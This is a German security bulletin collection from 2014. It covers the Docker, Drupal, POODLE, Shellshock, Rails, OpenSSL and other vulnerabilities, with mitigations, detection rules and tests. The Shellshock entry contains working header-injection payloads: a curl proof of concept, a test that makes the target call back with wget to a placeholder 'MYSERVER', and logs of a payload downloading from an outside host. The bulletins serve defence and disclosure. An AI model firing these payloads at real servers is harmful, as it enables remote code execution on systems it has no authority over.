"The Docker engine, up to and including version 1.3.1, was vulnerable to extracting files to arbitrary paths on the host during ‘docker pull’ and ‘docker load’ operations. This was caused by symlink and hardlink traversals present in Docker's image extraction. This vulnerability could be leveraged to perform remote code execution and privilege escalation.

Docker 1.3.2 remedies this vulnerability. Additional checks have been added to pkg/archive and image extraction is now performed in a chroot. No remediation is available for older versions of Docker and users are advised to upgrade."

Betroffen sind alle Versionen bis einschließlich 1.3.1, Updates auf die neue Version 1.3.2 stehen bereit.

Referenzen




SB 14.23 :: Lücke in Microsofts SChannel erlaubt Remote Code Execution (Update 2)

2014.11.12

Ein Bug in Microsofts TLS-Implementation SChannel erlaubt nach Aussagen von Microsoft Remote Code Execution, wenn ein Angreifer ein speziell präpariertes Netzwerk-Paket versendet


Betroffen sind alle Betriebssysteme (Server: ab Windows Server 2003 - Windows Server 2012 , Client: ab Vista - Windows 8.1, ink. Windows RT); Updates stehen bereit, ein Knowledgebase - Artikel erläutert die Hintergründe.

Es wird dringend geraten, die entsprechenden Updates einzuspielen.

Probleme mit den Updates

In dem Knowledgebase - Artikel - beschreibt Microsoft Probleme mit TLS 1.2 - Verbindungen zu Microsoft-Servern; dies kann u.U. auftreten, wenn Proxies von den genannten Servern eingesetzt werden und durchgehend TLS zum Einsatz kommmt, wie weiter oben berichtet.

"We are aware of an issue in certain configurations in which TLS 1.2 is enabled by default, and TLS negotiations may fail. When this problem occurs, TLS 1.2 connections are dropped, processes hang (stop responding), or services become intermittently unresponsive. To work around this issue, delete the following cipher entries in the registry:

TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_GCM_SHA256

Referenzen




SB 14.22 :: Magento-Plugin MAGMI mit schwerwiegenden Lücken

2014.10.22

Ben Lessani hat über mehrere Schwachstellen in dem Magento-Plugin MAGMI (Magento Mass Importer) berichtet, dies es Angreifern ermöglichen, beliebigen Code auf dem Server auszuführen, die komplette Datenbank zu löschen, Dateien zu lesen oder eigene PHP-Skripte hochzuladen.

Die Erweiterung sollte niemals ungeschützt im Docroot eines Magento-Shops installiert werden, da keinerlei Zugriffsschutz vorhanden ist; unglücklicherweise empfihelt die Installationsanweisung des MAGMI-Wiki genau diese Vorgehensweise, ohne näher auf eine notwendige Absicherung einzugehen. Nach Angaben des Finders sollen hunderttausende Installationen betroffen sein, nach eigener Recherche konnten 300 Shops gefunden werden, die größtenteils schon verwüstet wurden. Ein Thread auf Reddit berichtet von bereits gestohlenen Kreditkarten- Informationen.

Mitigations

Als Sofortmaßnahme empfiehlt es sich, der magmi-Ordner im Magento-Docroot mit chmod -R 000 ./magmi zu sperren. Es stehen zwar Updates bereit, diese verhindern aber nur den Upload von Dateien, und es ist weiterhin möglich, Dateien zu lesen und Befehle auf dem Server auszuführen.

Um Exploit-Versuche aufzuspüren und zu tracken stehen Naxsi-Signaturen bereit

Tests

  • MageStack stellt einen Online-Test zur Verfügung, der Shops auf das Vorhandensein des Plugins überprüft.



SB 14.21 :: TYPO3 - subcomponent Swiftmailer erlaubt Remote Code Execution

2014.10.22

Das TYPO3-Security-Team warnt in einem Advisory vor einer kritischen Lücke in einer Core-Komponente, die u.U. zu Remote Code Execution führen kann; der Fehler liegt in der Swiftmailer Library:

"The swiftmailer library in use allows to execute arbitrary shell commands if the "From" header comes from a non-trusted source and no "Return-Path" is configured."

Die Lücke wurde vom Swiftmailer-Team vor 4 Monaten gefixt: Security Fix: Swiftmailer 5.2.1 released

Betroffen sind TYPO3-Installationen, die die Config-Option $GLOBALS['TYPO3_CONF_VARS']['MAIL']['transport'] auf sendmail gesetzt haben.

Betroffene Versionen:

  • 4.5.0 - 4.5.36
  • 4.6.x
  • 4.7.0 - 4.7.19
  • 6.0.x
  • 6.1.0 - 6.1.11
  • 6.2.0 - 6.2.5

Eine weitere, im Advisory beschriebene und gefixte Lücke betrifft die OpenID System Extension. Die Lücke ermöglichte es Angreifern, beliebige Dateien mit den REchten des Webserver-Users zu lesen und Denial of Service-Angriffe gegen TYPO3-Installation auszuführen:

"The OpenID library that is shipped with TYPO3 allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via XRDS data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue. Affected are all TYPO3 installation with system extension openid installed and enabled."

Test

grep -e "GLOBALS['TYPO3_CONF_VARS']['MAIL']['transport']" /path/to/typo3conf/localconf.php | grep "sendmail"

Mitigations

Für die weiterhin gepflegten Versionen 4.5, 4.7, 6.1 und 6.2 stehen Updates bereit, für die nicht mehr unterstützen Versionen 4.6/6.0 stehen im Advisory](http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-002/) Patches bereit, die Änderungen für diese Versionen wurden auch in die Git-Repos eingepflegt

Referenzen




SB 14.20 :: Lücke in Drupal erlaubt SQL-Injection und Remote Code Execution (CVE-2014-3704)

2014.10.15

Das Drupal-Team hat ein Advisory veröffentlicht, indem vor einer kritischen SQL-Injection-Lücke gewarnt wird; die Lücke wird als hochkritisch eingestuft und kann u.U. zum Ausführen von PHP-Code (Remote Code Execution) führen:

"Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

This vulnerability can be exploited by anonymous users."

Ein Advisory von Sektioneins, den Findern der Lücke, erläutert die Hintergründe und gibt Hinweise auf einen POC, der bisher noch zurückgehalten wird.

Betroffene Versionen

  • Drupal 7.0 - 7.31

Mitigations / Workaround

Updates auf Drupal 7.32 stehen zum Download bereit und sollten dringend eingespielt werden.

Der auf Reddit aufgetauchte POC sollte von allen WAFs gelockt werden.

Referenzen




SB 14.19 :: POODLE: Lücke in OpenSSL/SSLv3 erlaubt u.U. das Mitlesen der Verbindung (CVE-2014-3566) (Update 1)

2014.10.15

tl;dr: Wenn Heartbleed und ShellShock die Stufe 10 haben, dann hat diese Lücke die Stufe 5 auf der nach oben offene Drama-Skala, und es sind eher Clients als Server betroffen.

Eine Lücke im SSLv3-Protokoll erlaubt Angreifern via MITM-Attacken das Mitlesen und Entschlüsseln von Verbindungen. Die vom Google Security Team entdeckte Lücke trägt den Name POODLE (Padding Oracle On Downgraded Legacy Encryption). Dies Auswirkungen der Lücke sind mehr clientseitig denn serverseitig zu sehen.

SSLv3 ist seit Jahren deprecated, wird aber noch von einer Vielzahl von Webseiten als Fallback für veraltete Browser eingesetzt; nach eigener Analyse der Alexa Top 10.000 Webseiten wird SSLv3 von 96% der Server unterstützt, die SSL-verschlüsselte Verbindungen anbieten, lediglich 4% bieten lediglich das neuere TLSv1-TSLv1.1 an.

sslv3-survey

Rob Graham gibt eine gute Zusammenfassung der Lücke:

  • It requires MitM (man-in-the-middle) to exploit
  • It requires, in almost all cases, JavaScript running in the browser.
  • It doesn't hack computers, but crack encryption.
  • What the hacker will likely try to do is hack your session cookies
  • It's the standard protocol that is vulnerable, not anybody's code.
  • Only older versions of SSL are impacted -- but everybody is backwards compatible with older versions.

Updates

  • Update 2 / 2014-10-15: SSL-Survey: 20% der Alexa-Top 10.000 Webseiten haben innherlab von 24h SSLv3 abgestellt
  • Update 1 / 2014-10-15: OpenSSL stellt eine neue Version (1.0.1j) mit SSL 3.0 Fallback protection zur Verfügung(TLS_FALLBACK_SCSV)

Mitigations

Als kurzfristigen Woraround empfiehlt sich, SSLv3 serverseitig abzustellen; man muss dabei in Kauf nehmen, dass z.B. User mit WindowsXP und IE6 Webseiten nicht mehr nutzen können. Nach ANgaben von CloudFlare betrifft dies 0.03% der Internetuser.

Der Impact z.B. auf Mailserver-Infrastruktur ist bisher noch unbekannt.

Das Google-Team emfiehlt, TLS_FALLBACK_SCSV zu nutzen, der ein Downgrade der Verbindung auf SSLv3 unterbindet:

"Disabling SSL 3.0 support, or CBC-mode ciphers with SSL 3.0, is sufficient to mitigate this issue, but presents significant compatibility problems, even today. Therefore our recommended response is to support TLS_FALLBACK_SCSV. This is a mechanism that solves the problems caused by retrying failed connections and thus prevents attackers from inducing browsers to use SSL 3.0. It also prevents downgrades from TLS 1.2 to 1.1 or 1.0 and so may help prevent future attacks."

TLS_FALLBACK_SCSV ist momentan für BoringSSL und OpenSSL (Chrome/Chromium-Browser) verfügbar.

# nginx 
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;


# apache bis 2.2.22
SSLProtocol all -SSLv2 -SSLv3


# apache ab 2.2.23
SSLProtocol TLSv1 TLSv1.1 TLSv1.2 


# postfix
smtpd_tls_protocols = !SSLv2, !SSLv3 
smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
smtp_tls_protocols = !SSLv2, !SSLv3


# dovecot
ssl_protocols = !SSlv2 !SSLv3

Tests

$ ./testssl.sh www.mare-system.de

########################################################
testssl.sh v2.0rc2  (https://testssl.sh)

Using "LibreSSL 2.0" on
      "termite:/usr/local/bin/openssl"

Testing now (2014-10-15 08:16) ---> :443 <---
("www.mare-system.de" resolves to "78.47.229.168") 


--> Testing Protocols

 SSLv2     Local problem: /usr/local/bin/openssl doesn't support "s_client -ssl2" 
 SSLv3     NOT offered (ok) 
 TLSv1     offered (ok) 
 TLSv1.1   offered (ok) 
 TLSv1.2   offered (ok) 

 SPDY/NPN   spdy/3.1, http/1.1 (advertised)
...

Referenzen




SB 14.18 :: XEN-Lücke erlaubt Lesen von Speicherbereichen auf dem Hypervisor (CVE-2014-7188)

2014.10.01

Ein Bug im Xen-Hypervisor erlaubt einer VM, Speicherbereiche auf dem Hypervisor zu lesen und damit u.U. auch auf andere VMs zuzugreifen. Auf Xen.org wurde dazu ein Advisory veröffentlicht. Joanna Rutkowska von Qubes hat dazu eine ausführliche Analyse veröffentlicht, weitere Infos gibt es in einem Artikel bei Bromium Labs

Betroffen sind alle alle Version von Xen 4.1 aufwärts auf x86 - Systemen, die auf HVM-Virtualisierung setzen; Hosts, die ausschließlich PV (para-virtualisierte) Maschinen einsetzen, sind von der Lücke nicht betroffen.

Alle Distributionen bieten mittlerweile Updates an; ein Restart der betroffenen Hosts und VMs ist notwendig. Der überraschende, globale Reboot bei Amazon AWS und Rackspace Ende letzter Woche ist auf diese Lücke zurückzuführen.

Referenzen




SB 14.17 :: Remote Code Execution via Bash (CVE-2014-6271) - Update 5

2014.09.24

Auf der OSS-Sec - Mailinglist ist ein Advisory aufgetaucht, in dem von einer Remote Code Execution (RCE) via Bash gewarnt wird.

Eine Liste mit weiteren, externen Writeups, Analysen, POCs etc findet sich unten in den Referenzen.


Update 1 - 2014-09-25

Update 2 - 2014-09-25

Update 3 - 2014-09-26

Update 4 - 2014-09-28

Update 5 - 2014-10-01


Die RCE ist nach Analyse von verschiedener Seite über das Netzwerk mit folgenden Konstellationen ausnutzbar:

  • via SSH mit ForcedCommands / und Bash als Login-Shell (bestätigt, POC siehe unten)
  • diverse Git/Subversion-Implementierung (Gitolite, Gitlab), die mit ForcedCommands arbeiten (bestätigt, POC siehe unten/SSH)
  • ggfs Git/Subversion-Hooks
  • Bash-Scripte als CGI-Programme
  • CGI-Programme auf Webservern, die via system(), open() oder popen() - Calls eine Systemshell spawnen via manipulierten Cookies, User-Agent, Host, Custom Headers (gitweb.cgi z.B., bestätigt)
  • FastCGI-Wrapper (unbestätigt, eher nicht angreifbar)
  • suPHP unter gewissen Voraussetzungen
  • DHCP-Clients, die Shellscripte ausführen (bestätigt, POC siehe unten)
  • CUPS (vermutet)
  • generell: Daemons/Systemprogramme, die Shellscripte aufrufen und Umgebungsvariablen auslesen (z.B. diverse Node.js - Module, die mit Shellscripten arbeiten)
  • PHP/Python/Ruby/Java - Programme, die popen() / system() aufrufen; siehe auch dazu den Kommentar von lcamtuf: "Note that on Linux systems where /bin/sh is symlinked to /bin/bash, any popen() / system() calls from within languages such as PHP would be of concern due to the ability to control HTTP_* in the env."
    • Debian: /bin/sh -> dash (OK)
    • SLES: /bin/sh -> bash (potentiell verwundbar)
    • RedHat: /bin/sh -> bash (potentiell verwundbar)
  • SUID-Pogramme, die eine Shell spawnen
  • openVPN (siehe mubix-shellschock-pocs in den Referenzen)

folgender POC zeigt via manipuliertem User-Agent , wie einfach ein möglicher Exploit gegen einen Webserver ist; ausnutzbar sind alle Felder im HTTP-Header (Cookies, User-Agent, Host, Custom Headers)

[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa

betroffene Bash-Versionen

  • Bash 3/4
  • sh, wenn auf /bin/bash umgeleitet wird

Mitigations

  • alle großen Distros sollten Updates bereitstellen
  • von Bash auf Dash als Login-Shell wechseln
  • Für Snort/Suricata und Naxsi-WAF stehen Updates und Signaturen bereit
  • RedHat beschribt einige Mitigations und Workarounds mit Iptables in einem weiteren Artikel
  • für Webserver, die via system() / popen() - Calls angreifbar sind kann man den symlink von /bin/sh von /bin/bash auf /bin/dash ändern; Applikationen sollten auf Funktion getestet werden

  • Naxsi-Regel:

MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393  ;
  • IPTables (kann durch Paket-Fragmentierung umgangen werden)
iptables --append INPUT -m string --algo kmp --hex-string '|28 29 20 7B|' --jump DROP
  • ModSecurity-Regeln:
Request Header values:

SecRule REQUEST_HEADERS "^\(\) {" "phase:1,deny,id:1000000,t:urlDecode,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
SERVER_PROTOCOL values:

SecRule REQUEST_LINE "\(\) {" "phase:1,deny,id:1000001,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
GET/POST names:

SecRule ARGS_NAMES "^\(\) {" "phase:2,deny,id:1000002,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
GET/POST values:

SecRule ARGS "^\(\) {" "phase:2,deny,id:1000003,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
File names for uploads:

SecRule  FILES_NAMES "^\(\) {"  "phase:2,deny,id:1000004,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-62

Erkennen eines Shellshock-Einbruchs

folgende Methoden sind nur für Webserver gültig und garantiert keine 100%ige Erkennungsrate

  • bei einem erfolgreichen Einbruch sollten in den Error-Logs die Terminal-Ausgaben der ausgeführten Kommandos stehen (dies liesse sich u.U. aber mit command 2>&1 > /dev/null umgehen
  • ggfs ist in den Access-Logs die Zeichenkette "() {" im Feld des User-Agent zu finden; auch hier ist keine 100%ige Sicherheit gegeben, da Angreifer andere HTTP-Header-Felder für einen Angriff benutzen können (Host, Cookies)
  • exemplarisch unterstehend die Ausgabe für ein erfolgreich ausgeführtes wget http://fump.8ack.org/chunked (error.log und access.log)
# access-log

::1 - - [26/Sep/2014:09:27:47 +0200] "GET /py.cgi HTTP/1.1" 200 166 "-" "() { :;}; /bin/ls"
::1 - - [26/Sep/2014:09:28:12 +0200] "GET /hagelschaden/py.cgi HTTP/1.1" 200 166 "-" "() { :;}; echo hello"
::1 - - [26/Sep/2014:09:29:22 +0200] "GET /py.cgi HTTP/1.1" 200 166 "-" "() { :;}; /usr/bin/curl"
::1 - - [26/Sep/2014:09:31:07 +0200] "GET /py.cgi HTTP/1.1" 200 166 "-" "() { :;}; /usr/bin/wget  http://fump.8ack.org/chunked 2>&1 > /dev/null"


# error-log

[Fri Sep 26 09:25:18 2014] [error] [client ::1] --2014-09-26 09:25:18--  http://fump.8ack.org/chunked
[Fri Sep 26 09:25:18 2014] [error] [client ::1] Resolving fump.8ack.org (fump.8ack.org)... 
[Fri Sep 26 09:25:18 2014] [error] [client ::1] 46.4.8.254
[Fri Sep 26 09:25:18 2014] [error] [client ::1] Connecting to fump.8ack.org (fump.8ack.org)|46.4.8.254|:80... 
[Fri Sep 26 09:25:18 2014] [error] [client ::1] connected.
[Fri Sep 26 09:25:18 2014] [error] [client ::1] HTTP request sent, awaiting response... 
[Fri Sep 26 09:25:18 2014] [error] [client ::1] 200 OK
[Fri Sep 26 09:25:18 2014] [error] [client ::1] Length: 2823 (2.8K) [text/html]
[Fri Sep 26 09:25:18 2014] [error] [client ::1] chunked: Permission denied
[Fri Sep 26 09:25:18 2014] [error] [client ::1] 
[Fri Sep 26 09:25:18 2014] [error] [client ::1] Cannot write to `chunked' (Permission denied).

Tests

# CVE-2014-6271 (ShellShock Part 1)

### Output, wenn verwundbar:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test

### Output, wenn nicht angreifbar:

 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test

# CVE-2014-7169 (ShellShock Part 2)

### 


### 
  • Test via Webserver (CGI)
    • TARGET: Server., der angegriffen wird
    • MYSERVER: Server unter meiner Kontrolle
# @ TARGET
$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 Sep 25 22:43 /bin/sh -> bash

$ cat py.cgi
#!/usr/bin/python

import os

print """Content-type: text/plain

hello
"""

pp = os.popen("ls -la").readlines()

----------------

# zugriff auf py.cgi mit einem wget-aufruf auf eine Seite, die Zugriffe
# inklusive callback zu einem server, der zugriffe loggt (MYSERVER)
$ curl -k -H 'User-Agent: () { :;}; /usr/bin/wget http://MYSERVER/?shellshock=gotcha' http://target/py.cgi 

# im error.log sollte auf TARGET sollten hinweise auf die ausführung von wget 
# zu finden sein

# kontrolle auf myserver über den zugriff via wget
---------------------------
Headers 
X-Real-Ip: 1.2.3.4
Content-Length: 
User-Agent: Wget/1.13.4 (linux-gnu)
Connection: close
Host: localhost:5115
Accept: */*
Content-Type: 

---
Query
shellshock=gotcha

langfistiger Impact

Paul Vixie hat den möglichen, langfristigen Impact wunderbar in einer Mail auf FD zusammengefasst:

heartbleed was a read-only privilege escalation, and i normally consider
privilege escalation vulns "worse than" remote code execution vulns. as
an example, the private key used by the SSL-enabled server was exposed
to read access, making heartbleed also a credential compromise vuln.
that's a high score because of all the second-order effects reachable
once you have a credential compromise.

however, i'd score this bash bug higher, because many online systems
have multiple privilege escalation vulns which are reachable once you
have remote code execution capability, and preventing remote code
execution is the "crunchy exterior" to the privilege escalation's "soft
gooey interior". (borrowing those quoted terms from cheswick et al,
"firewalls", first edition.)

the other reason to score the bash bug higher than heartbleed is the
several-orders-of-magnitude greater attack surface. systems that use
bash and put it in a data path (web CGI and dhcp client-side hooks being
examples) are far more numerous than systems which used openssl, and so
i expect the long term impact of this bash bug to be far greater than
from heartbleed.

the long tail problem, wherein many instances of this bash bug are not
inventoried, and of those inventoried, most are not field upgradeable,
and of those field upgradeable, most are operated without auditing. that
means: this bash bug will still be globally available to miscreants even
after all humans now living are dead and the world contains only our
descendants.

fixing apple and redhat and other systems we actually know about is the
easy, and insigificant, part of this puzzle.

-- 
Paul Vixie

Referenzen




SB 14.16 :: SSL Virtual Host Confusion erlaubt Sessionübernahme (CVE-2014-3616)

2014.09.17

Antoine Delignat-Lavaud hat eine Angriffsmöglichkeit gegen TLS/SSL-basierte Webserver/Reverse-Proxies vorgestellt, mit der es Ihm gelungen ist

  • HTTPS-Requests auf eigene Webseiten umzuleiten
  • SingleSignOn - Access-Tokens auszulesen
  • XSS-Attacken auf Browser durch HTTPS-Redirection auszuführen

Der Angriff ist gegen alle populären Web/Reverse-Proxy-Server (Apache, Nginx, IIS), aber auch CDN-Frontends und SSL-Terminatoren möglich; betroffen sind vornehmlich große CDN.

Um den Angriff auszuführen sind folgende Voraussetzungen nötig:

  • mehrere SSL-Serverblöcke (SNI oder IP-basiert)
  • Wildcard- oder Multiple Zertifikate
  • gemeinsam genutzter SSL-Session-Cache oder SSL-Session-Key
  • der Angreifer muss privilegierten Netzwerkzugriff haben und das DNS des Angegriffenen kontrollieren können

Im folgenden Video wird der Angriff auf u.a. Twitter, Paypal, LinkedIn, Akamai u.a. demonstriert; weitere Videos finden sich auf der Webseite des Autors.

Workarounds

Nginx hat das Problem mittlerweile mit den Versionen 1.7.5 und 1.6.2 gefixt.

Mit folgenden Konfigurationstricks lässt sich das Problem möglicherweise umgehen:

  • keine multiplen Zertifikaten, d.h. pro SSL-Host ein SSL_Zertifikat
  • Fallback-Virtual-Host (Default-Host) für jede IP
  • jeweils einen eigenen SSL-Cache pro Virtual Host, wenn benutzt ( Nginx-Doku / Apache-Doku )
# Nginx:

server {
   server_name a.com;
   listen 443 ssl;
   ... 
   ssl_session_cache shared:CacheA:1m
  ...
}
server {
   server_name b.com;
   listen 443 ssl;
   ... 
   ssl_session_cache shared:CacheB:1m
  ...
}

# default fallback
server {
    server_name "";
    listen 443 ssl default_host;
    ... 
     return 400;
}

# Apache

<VirtualHost *:443>

  Servername a.com
  ...
  SSLSessionCache shm:/var/run/apache/ssl_cache_A(1024000)
  ... 
</VirtualHost>

<VirtualHost *:443>

  Servername a.com
  ...
  SSLSessionCache shm:/var/run/apache/ssl_cache_B(1024000)
  ... 
</VirtualHost>

Referenzen




SB 14.15 :: Lücke in Rails erlaubt Setzen beliebiger Model-Attribute (CVE-2014-3514)

2014.08.27

Ein Advisory auf der Rails-Security-Mailinglist warnt vor eine Lücke, durch die ein Angreifer u.U. beliebige Datenbankeinträge manipulieren kann.

The create_with functionality in Active Record was implemented incorrectly 
and completely bypasses the strong parameters protection.  
Applications which pass user-controlled values to create_with could allow 
attackers to set arbitrary attributes on models.

All users running an affected release should either upgrade or use one of 
the workarounds immediately.

Betroffen sind die Versionen 4.x; nicht betroffen sind alle Versionen vor 4.0. Patches mit Updates auf die Versionen 4.0.9 / 4.1.5 stehen bereit und sind auch auf der Mailingliste verfügbar; dort werden auch Workarounds angesprochen.

Gitlab, ein größeres Projekt, dass auf Rails 4.x setzt, ist nach eigener Aussage nicht von der Lücke betroffen.

Referenzen




SB 14.14 :: Apache httpd mod_status Heap Buffer Overflow Remote Code Execution (CVE-2014-0226) (Update)

2014.07.17

Die Zero-Day-Initiative hat ein Advisory veröffentlicht, indem vor einer kritischen Lücke in Apache's mod_status gewarnt wird: [1]

"This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache HTTPD server. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution."

Aus dem Apache - ChangeLog: "A race condition was found in mod_status. An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a public accessible server status page."

Betroffen ist der gesamte 2.x - Zweig von Apache; Das Problem ist im Apache-Upstream bereits gefixt [2,3].

Am 21. 07. hat Marek Kroemeke, der Finder der Lücke, auf Fulldisclosure einen POC für die Lücke veröffentlicht:

"Below are the information leak samples gathered by running the poc against the testing Apache instance. Leaks include i.e. HTTP headers, htaccess content, httpd.conf content etc. On a live systems with a higher traffic samples should be way more interesting."

Workaround

Das Modul ist nicht immer per default aktiviert; auf Debian-Servern z.B. muss es explizit angeschaltet werden.

  • Deaktivieren des externen Zugriffs von mod_status, wenn dieses Modul benötigt wird
# http://httpd.apache.org/docs/2.2/mod/mod_status.html#enable
<Location /server-status>
     SetHandler server-status
     Order Deny,Allow
     Deny from all
     Allow from 127.0.0.1
 </Location>
  • Naxis-Signatur
MainRule "str:/server-status" "msg:Apache ServerStatus - Access" "mz:URL" "s:$UWA:8" id:42000080  ;

Referenzen




SB 14.13 :: Auslesen von Speicherbereichen / SSL-Private-Keys mittels PHP möglich (CVE-2014-4721)

2014.07.05

Stefan Esser hat eine Lücke in der Apache-PHP-Implementation (mod_php) entdeckt, die das Auslesen beliebiger Speicherbereiche und damit von SSL-Private-Keys über die phpinfo() - Funktion ermöglichen; betroffen sind alle Versionen ab 5.3.

Das PHP-Security-Team hat den gemeldeten Bug zwar stillschweigend für die Versionen 5.4/5.5 geschlossen, sich aber anscheinend nicht weiter zu den Bugs geäussert und keine CVEs beantragt. Benutzer des immernoch in LTS-Versionen verwendeten 5.3er - Zweigs bleiben verwundbar, da für PHP 5.3 von Seiten der PHP-Entwickler keine Updates mehr zur Verfügung gestellt werden.

Probleme ergeben sich vornehmlich für Anbieter, die keine Kontrolle über den hochgeladenen PHP-Code haben und dritten Zugang zu den Systemen ermöglichen (Shared Hosting), da ggfs Zugriff auf den kompletten Apache-Speicherbereich besteht und u.U. sensitive Daten ausgespäht werden können.

Mitigations:

  • Benutzen eines vorgelagerten ReverseProxy/SSL-Offload (Schütz nur vor Auslesen der SSL-Keys, Lücke bleibt bestehen)
  • Upgrade auf PHP 5.4/PHP 5.5

mögliche, noch nicht bestätigte Mitigations:

  • Abstellen der phpinfo()- Funktion in der php.ini ( disable_functions = phpinfo )
  • Wechsel von mod_php auf php_fpm / php_cgi

phpinfoleak

Referenzen




SB 14.12 :: 7 neue Lücken in OpenSSL (CVE-2014-0224, CVE-2014-0221, CVE-2014-0195) (Update 2)

2014.06.06

Die OpenSSL-Foundation hat ein Advisory mit mehreren schweren Lücken veröffentlicht [1]:

  • SSL/TLS MITM vulnerability (CVE-2014-0224)
  • DTLS recursion flaw (CVE-2014-0221)
  • DTLS invalid fragment vulnerability (CVE-2014-0195)
  • SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198)
  • SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)
  • Anonymous ECDH denial of service (CVE-2014-3470)

Die ersten drei Lücken sind dabei schwerwiegend; so lässt sich die MITM-Lücke dazu ausnutzen, TLS-Verbindungen einfach zu übernehmen, wenn sowohl Server als auch Client von der Lücke betroffen sind [2,3]; CVE-2014-0221 kann zu eine Buffer-Overrun und im schlimmsten Falle zu Remote Code Execution auf dem Server führen, CVE-2014-0195 kann zu einem DOS des betroffenen Servers führen.

Updates

  • Update 2: Online-Tests (8ack, NCC-Group)
  • Update 1: POC/Testscript für CVE-2014-0224 SSL/TLS MITM vulnerability

Mitgations & Workarounds

Updates stehen bereit; die OpenSSL-Entwickler haben die Distros (bis auf OpenBSD) diesmal im Vorfeld informiert und Patches bereitgestellt. [4]

POCs und Tests

Online:

Die Tripwire-Entwickler haben ein Testscript zur Verfügung gestellt, um Server auf die MITM-Lücke ( SSL/TLS MITM vulnerability (CVE-2014-0224)) zu testen [5]; dieses Script ist auch über die 8ack-Tools verfügbar [6].

Referenzen

  1. OpenSSL Security Advisory [05 Jun 2014]
  2. How I discovered CCS Injection Vulnerability (CVE-2014-0224)
  3. Early ChangeCipherSpec Attack (CVE-2014-0224)
  4. Re: OpenSSL seven security fixes
  5. DETECTION SCRIPT FOR CVE-2014-0224 (OPENSSL CCS INJECTION)
  6. SSL-Tools @ 8ack
  7. ZDI-14-173/CVE-2014-0195 - OpenSSL DTLS Fragment Out-of-Bounds Write: Breaking up is hard to do
  8. More Details Regarding CVE-2014-0195 (DTLS arbitrary code execution)



SB 14.11 :: Kritische Rails-Lücke erlaubt Lesen beliebiger Dateien (CVE-2014-0130) (Update3)

2014.05.09

Eine kritische Lücke im Ruby-on-Rails-Framework erlaubt Directory Traversal und damit das Auslesen beliebiger Dateien auf dem Server. [1,2]

  • Update 30.05: Jeff Jarmoc beschreibt in dem Paper "The Anatomy of a Rails Vulnerability CVE-2014-0130: From Directory Traversal to Shell", welche Deployment-Server mit welchen Setup (Globbing vs Nonglobbing) von der Lücke betroffen sind [10]
  • Update 9.5.: Es ist momentan (Stand: 9.5.) nicht ganz klar, unter welchen Umständen die Lücke ausnutzbar ist [6,7]: entweder, wie im Orginal-Advisory [2] beschrieben, nur in Verbindung von globbing routes mit :action Parametern, oder aber, wie im Nachfolgeadvisory [1] bemerkt, mit weiteren Parametern; nach einigen Kommentaren bei reddit ist das Problem nicht auf's globbing beschränkt [8]
Globbing is absolutely not necessary. All that's needed is a route that accepts ':action' from the URL. All you need to do then, is HTML escape the periods and forward slashes in the path.

In einem umfangreichen Artikel erläutert Ville Lautanala von Flowdock Hintergründe und Auswirkungen. [4].

Jeff Jarmoc hat analysiert, welche Deployment-Server in welchem Setup betroffen sein können: [10]

rails-cve-2014-0130

Die Lücke entsteht durch die Benutzung von implicit/globbing routes; die in dem Original-Advisory genannnte Einschränkung, dass die Lücke nur duch die Benutzung von globbing routes in Verbindung mit :action Parametern gilt [2], wurde in einem Nachfolgeadvisory [1] aufgehoben mit dem Hinweis, dass weitere Angriffsvektoren gefunden wurden.

Aus dem Advisory:

The implicit render functionality allows controllers to render a template,
even if there is no explicit action with the corresponding name.  This
module does not perform adequate input sanitization which could allow an
attacker to use a specially crafted request to retrieve arbitrary files
from the rails application server.
  • Betroffene Versionen: Alle
  • gefixte Versionen: 4.1.1, 4.0.5, 3.2.18

Es wird dringend empfohlen, die eigene Installationen auf Verwundbarkeit zu überprüfen und ggfs die Updates einzuspielen:

bundle update rails

Check der eigenen Rails-Version

bundle list rails

Workarounds

Jede halbwegs aktuelle WAF sollte Path Traversal grundsätzlich unterbinden.

